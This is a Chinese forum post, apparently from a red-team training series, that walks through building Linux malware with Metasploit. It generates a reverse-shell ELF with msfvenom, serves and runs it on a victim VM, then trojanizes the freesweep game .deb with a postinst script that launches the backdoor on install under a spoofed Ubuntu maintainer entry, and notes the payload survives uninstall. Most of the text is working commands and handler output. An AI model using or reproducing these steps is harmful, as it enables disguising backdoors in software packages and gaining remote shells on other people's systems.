红队/白帽必经之路(19)——如何用Metasploit 制作Linux恶意木马病毒/软件获 ...

打印 上一主题 下一主题

主题 784|帖子 784|积分 2352



   欢迎各位彦祖与热巴畅游本人专栏与博客

  你的三连是我最大的动力

  以下图片仅代表专栏特色 [点击箭头指向的专栏名即可闪现]

    专栏跑道一

  

  ➡️网络空间安全——全栈前沿技术持续深入学习 

  

   
专栏跑道二


  
➡️ 24 Network Security -LJS 


  

  
​ 

  

    专栏跑道三

  
➡️ MYSQL REDIS Advance operation


  

    专栏跑道四

  

  ➡️HCIP;H3C-SE;CCIP——LJS[华为、华三、思科高级网络]

  

    专栏跑道五

  
➡️RHCE-LJS[Linux高端骚操作实战篇]


    专栏跑道六

  

  ➡️数据结构与算法[考研+现实工作应用+C程序设计]

  

    专栏跑道七

  

  ➡️RHCSA-LJS[Linux初级及进阶骚技能]

  

  


上节回顾


   目录
  欢迎各位彦祖与热巴畅游本人专栏与博客
  你的三连是我最大的动力
  以下图片仅代表专栏特色 [点击箭头指向的专栏名即可闪现]
  专栏跑道一
  ➡️网络空间安全——全栈前沿技术持续深入学习 
  专栏跑道二
  ➡️ 24 Network Security -LJS 
  专栏跑道三
  ➡️ MYSQL REDIS Advance operation
  专栏跑道四
  ➡️HCIP;H3C-SE;CCIP——LJS[华为、华三、思科高级网络]
  专栏跑道五
  ➡️RHCE-LJS[Linux高端骚操作实战篇]​编辑​
  专栏跑道六
  ➡️数据结构与算法[考研+现实工作应用+C程序设计]
  专栏跑道七
  ➡️RHCSA-LJS[Linux初级及进阶骚技能]
  上节回顾
  1.实战-制作 Linux 恶意软件获取 shell
  使用 msfvenom 生成 linux 可实行文件
  
  参数增补详解:
  开启 apache服务
  
  MSF 设置监听[老样子4件套]
  接着打开 centos 7.5 xuegod63 linux 虚拟机,新建一个终端:
  下载后门
  添加实行权限
  实行程序
  然后惊讶的发现MSF控制台已经建立Session喽
  检察相关信息 
  留意:
  2.实战-制作恶意 deb 软件包来触发后门
  制作恶意软件包使用--download-only 方式下载软件包不进行安装
  将软件包移动到 root 目录
  解压软件包到 free 目录
  留意一下:
  创建软件包信息目录
  创建软件包的信息文件
  增补一下:
  创建 deb 软件包,安装后脚本文件,来加载后门
  给脚本文件添加实行权限
  
  
  构建新的 deb 安装包
  ​
  新打开一个终端 CTRL+SHIFT+T,生成 MSF 监听
  没什么好说的[MS4件套]
  ​
  打包
  回到 MSF 控制台
  ​
  末了卸载软件包
  ​
  就算恶意软件包被卸载,payload 依旧正常运行。
  ​
  
  
  


1.实战-制作 Linux 恶意软件获取 shell

使用 msfvenom 生成 linux 可实行文件

  1. ┌──(root㉿kali-2024)-[/home/ljs/Desktop]
  2. └─# msfvenom -a x64 --platform linux -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.1.53 LPORT=4444 -b "\x00" -f elf -o /var/www/html/xuegod                                   
  3. Found 3 compatible encoders
  4. Attempting to encode payload with 1 iterations of x64/xor
  5. x64/xor succeeded with size 175 (iteration=0)
  6. x64/xor chosen with final size 175
  7. Payload size: 175 bytes
  8. Final size of elf file: 295 bytes
  9. Saved as: /var/www/html/xuegod
  10.                                 
复制代码


参数增补详解:
 


   

  • --platform 指定 linux
  • -f 指定 elf 即 linux 操作系统的可实行文件范例
  • -b 去掉坏字符
  开启 apache服务

  1. ┌──(root㉿kali-2024)-[/home/ljs/Desktop]
  2. └─# /etc/init.d/apache2 start
  3. Starting apache2 (via systemctl): apache2.service.
复制代码



MSF 设置监听[老样子4件套]


  1. msf6 exploit(multi/handler) > back
  2. msf6 >  use exploit/multi/handler
  3. [*] Using configured payload windows/meterpreter/reverse_tcp
  4. msf6 exploit(multi/handler) >  set payload linux/x64/meterpreter/reverse_tcp
  5. payload => linux/x64/meterpreter/reverse_tcp
  6. msf6 exploit(multi/handler) > set LHOST 192.168.1.53
  7. LHOST => 192.168.1.53
  8. msf6 exploit(multi/handler) > set LPORT 4444
  9. LPORT => 4444
  10. msf6 exploit(multi/handler) > run
复制代码
接着打开 centos 7.5 xuegod63 linux 虚拟机,新建一个终端:

   

  • 下载后门
  1. ──(root㉿kali-2024)-[/home/ljs/Desktop]
  2. └─# wget http://192.168.1.53/xuegod
复制代码

  1. ┌──(root㉿kali-2024)-[/home/ljs/Desktop]
  2. └─# ./xuegod
复制代码

   

  • 添加实行权限
  1. ┌──(root㉿kali-2024)-[/home/ljs/Desktop]
  2. └─# chmod +x xuegod
复制代码
实行程序

  1. ┌──(root㉿kali-2024)-[/home/ljs/Desktop]
  2. └─# ./xuegod
复制代码



然后惊讶的发现MSF控制台已经建立Session喽


检察相关信息 

  1. meterpreter > ifconfig
复制代码


留意:

   

  • 退出 session 需要使用 quit 正常退出 session 否则会影响下次连接。
  1. meterpreter > quit
复制代码




2.实战-制作恶意 deb 软件包来触发后门


制作恶意软件包使用--download-only 方式下载软件包不进行安装

  1. ──(root㉿kali-2024)-[/home/ljs/Desktop]
  2. └─#  apt --download-only install freesweep
  3. 正在读取软件包列表... 完成
  4. 正在分析软件包的依赖关系树... 完成
  5. 正在读取状态信息... 完成                 
  6. 下列软件包是自动安装的并且现在不需要了:
  7.   cpp-13 fonts-noto-color-emoji ibverbs-providers libboost-iostreams1.74.0
  8.   libboost-thread1.74.0 libcephfs2 libgfapi0 libgfrpc0 libgfxdr0 libglusterfs0 libibverbs1
  9.   libnsl-dev libpython3.11-dev librados2 librdmacm1 libtirpc-dev python3-lib2to3 python3.11-dev
  10.   samba-ad-provision samba-dsdb-modules samba-vfs-modules
  11. 使用'apt autoremove'来卸载它(它们)。
  12. 下列【新】软件包将被安装:
  13.   freesweep
  14. 升级了 0 个软件包,新安装了 1 个软件包,要卸载 0 个软件包,有 1798 个软件包未被升级。
  15. 需要下载 55.8 kB 的归档。
  16. 解压缩后会消耗 142 kB 的额外空间。
  17. 获取:1 http://kali.download/kali kali-rolling/main amd64 freesweep amd64 1.0.2-1 [55.8 kB]
  18. 已下载 55.8 kB,耗时 1秒 (38.4 kB/s)
  19. 于“仅下载”模式中下载完毕
复制代码


将软件包移动到 root 目录

  1. ┌──(root㉿kali-2024)-[/home/ljs/Desktop]
  2. └─#  mv /var/cache/apt/archives/freesweep_1.0.2-1_amd64.deb ~/
复制代码

解压软件包到 free 目录

  1. ┌──(root㉿kali-2024)-[/home/ljs/Desktop]
  2. └─# cd ~               
  3.          
  4. ┌──(root㉿kali-2024)-[~]
  5. └─# dpkg -x freesweep_1.0.2-1_amd64.deb free
  6.                                             
复制代码



留意一下:

   

  • 生成软件包时无论是 payload 的和软件包信息都需要选择可以或许在目标操作系统上实行的创建软件包信息目录
  生成恶意代码到软件包源文件中
  1. ┌──(root㉿kali-2024)-[~]
  2. └─#  msfvenom -a x64 --platform linux -p linux/x64/shell/reverse_tcp
  3. LHOST=192.168.1.53 LPORT=4444 -b "\x00" -i 10 -f elf -o /root/free/usr/games/freesweep_sources
  4. 参数详解:
  5. msfvenom -a x64 \                    # 使用 64 位架构
  6.     --platform linux \                # 目标平台为 Linux
  7.     -p linux/x64/shell/reverse_tcp \  # 使用反向 TCP Shell 载荷
  8.     LHOST=192.168.1.53 \              # 设置攻击者的 IP 地址
  9.     LPORT=4444 \                      # 设置攻击者的监听端口
  10.     -b "\x00" \                       # 避免使用空字符(NULL 字符)
  11.     -i 10 \                           # 设置载荷编码的迭代次数为 10
  12.     -f elf \                          # 输出为 ELF 格式的文件
  13.     -o /root/free/usr/games/freesweep_sources  # 指定输出路径和文件名
复制代码

创建软件包信息目录

  1. ┌──(root㉿kali-2024)-[~]
  2. └─#  mkdir free/DEBIAN && cd free/DEBIAN
  3.                                              
复制代码
创建软件包的信息文件

增补一下:

   

  • 为什么用 tee 而不是直接输出到文件? tee 不仅将内容写入文件,还会将它显示在标准输出上(即终端),使得你可以看到你所写入的内容。直接使用 > 或 >> 大概无法显示文件内容。tee 适用于需要同时检察和写入文件的场景。
  • 'EOF' 引号的作用: 使用单引号 'EOF' 表示不会进行变量更换。这是一个安全的做法,特别是当文本中大概含有特殊字符时。如果不希望更换变量或转义字符,就使用单引号;如果希望进行变量更换,可以去掉引号,直接使用 << EOF
  1. ┌──(root㉿kali-2024)-[~]
  2. └─#  tee /root/free/DEBIAN/control << 'EOF'
  3. heredoc>
  4. heredoc> Package: freesweep
  5. Version: 1.0.1-1
  6. Section: Games and Amusement
  7. Priority: optional
  8. Architecture: amd64
  9. Maintainer: Ubuntu MOTU Developers (ubuntu-motu@lists.ubuntu.com)
  10. Description: a text-based minesweeper
  11. Freesweep is an implementation of the popular minesweeper game, where
  12. one tries to find all the mines without igniting any, based on hints given
  13. by the computer. Unlike most implementations of this game, Freesweep
  14. works in any visual text display - in Linux console, in an xterm, and in
  15. most text-based terminals currently in use.
  16. EOF
  17. Package: freesweep
  18. Version: 1.0.1-1
  19. Section: Games and Amusement
  20. Priority: optional
  21. Architecture: amd64
  22. Maintainer: Ubuntu MOTU Developers (ubuntu-motu@lists.ubuntu.com)
  23. Description: a text-based minesweeper
  24. Freesweep: is an implementation of the popular minesweeper game, where one tries to find all the mines without igniting any, based on hints given by the computer. Unlike most implementations of this game, Freesweep works in any visual text display - in Linux console, in an xterm, and in most text-based terminals currently in use.
复制代码

创建 deb 软件包,安装后脚本文件,来加载后门

  1. ┌──(root㉿kali-2024)-[~]
  2. └─#  tee /root/free/DEBIAN/postinst << 'EOF'
  3. heredoc> #!/bin/bash
  4. sudo chmod 2755 /usr/games/freesweep_sources
  5. sudo /usr/games/freesweep_sources &
  6. EOF
  7. #!/bin/bash
  8. sudo chmod 2755 /usr/games/freesweep_sources
  9. sudo /usr/games/freesweep_sources &
复制代码

   

  •  sudo /usr/games/freesweep_sources
  • & 是将实行的恶意代码/命令放到后台运行
  给脚本文件添加实行权限

  1. ┌──(root㉿kali-2024)-[~]
  2. └─#  chmod 755 /root/free/DEBIAN/postinst
复制代码




构建新的 deb 安装包

  1. ┌──(root㉿kali-2024)-[~/free/DEBIAN]
  2. └─# dpkg-deb --build /root/free/
  3. dpkg-deb: 正在 '/root/free.deb' 中构建软件包 'freesweep'。
复制代码


留意:
   会在当前目录下生成构建的软件包 freesweep.db ,我们当前的目录是~/free/DEBIAN
  1. ┌──(root㉿kali-2024)-[~/free/DEBIAN]
  2. └─#  ls /root/free.deb
  3. /root/free.deb
  4.                
复制代码


新打开一个终端 CTRL+SHIFT+T,生成 MSF 监听

  1. ┌──(root㉿kali-2024)-[~]
  2. └─# msfconsole
  3. Metasploit tip: Use the 'capture' plugin to start multiple
  4. authentication-capturing and poisoning services
  5.                                                   
  6.                                    ___          ____
  7.                                ,-""   `.      < HONK >
  8.                              ,'  _   e )`-._ /  ----
  9.                             /  ,' `-._<.===-'
  10.                            /  /
  11.                           /  ;
  12.               _          /   ;
  13. (`._    _.-"" ""--..__,'    |
  14. <_  `-""                     \
  15.   <`-                          :
  16.    (__   <__.                  ;
  17.      `-.   '-.__.      _.'    /
  18.         \      `-.__,-'    _,'
  19.          `._    ,    /__,-'
  20.             ""._\__,'< <____
  21.                  | |  `----.`.
  22.                  | |        \ `.
  23.                  ; |___      \-``
  24.                  \   --<
  25.                   `.`.<
  26.                     `-'
  27.        =[ metasploit v6.3.55-dev                          ]
  28. + -- --=[ 2397 exploits - 1232 auxiliary - 422 post       ]
  29. + -- --=[ 1391 payloads - 46 encoders - 11 nops           ]
  30. + -- --=[ 9 evasion                                       ]
  31. Metasploit Documentation: https://docs.metasploit.com/
  32. msf6 >
复制代码
没什么好说的[MS4件套]

  1. msf6 > use exploit/multi/handler
  2. [*] Using configured payload generic/shell_reverse_tcp
  3. msf6 exploit(multi/handler) >  set payload linux/x64/meterpreter/reverse_tcp
  4. payload => linux/x64/meterpreter/reverse_tcp
  5. msf6 exploit(multi/handler) > set LHOST 192.168.1.53
  6. LHOST => 192.168.1.53
  7. msf6 exploit(multi/handler) > set LPORT 4444
  8. LPORT => 4444
  9. msf6 exploit(multi/handler) > run
复制代码


   

  • 最好是在 Kali 中实行如果再 XSHELL 中实行大概会导致窗口卡死
  打包

  1. dpkg -i free.deb   
  2. # dpkg:用于管理Debian软件包的工具,-i:安装选项,free.deb:待安装的.deb包文件
复制代码
回到 MSF 控制台

  1. meterpreter > getuid
复制代码


末了卸载软件包

  1. ┌──(root㉿kali-2024)-[~]
  2. └─# dpkg -r freesweep
  3. (正在读取数据库 ... 系统当前共安装有 406336 个文件和目录。)
  4. 正在卸载 freesweep (1.0.2-1) ...
  5. 正在处理用于 man-db (2.12.0-3) 的触发器 ...
  6. 正在处理用于 hicolor-icon-theme (0.17-2) 的触发器 ...
  7. 正在处理用于 desktop-file-utils (0.27-1) 的触发器 ...
  8.                                                       
复制代码


就算恶意软件包被卸载,payload 依旧正常运行。

  1. meterpreter > pwd
复制代码
  

  • exit 退出即可
  




免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?立即注册

x
回复

使用道具 举报

0 个回复

倒序浏览

快速回复

您需要登录后才可以回帖 登录 or 立即注册

本版积分规则

温锦文欧普厨电及净水器总代理

金牌会员
这个人很懒什么都没写!

标签云

快速回复 返回顶部 返回列表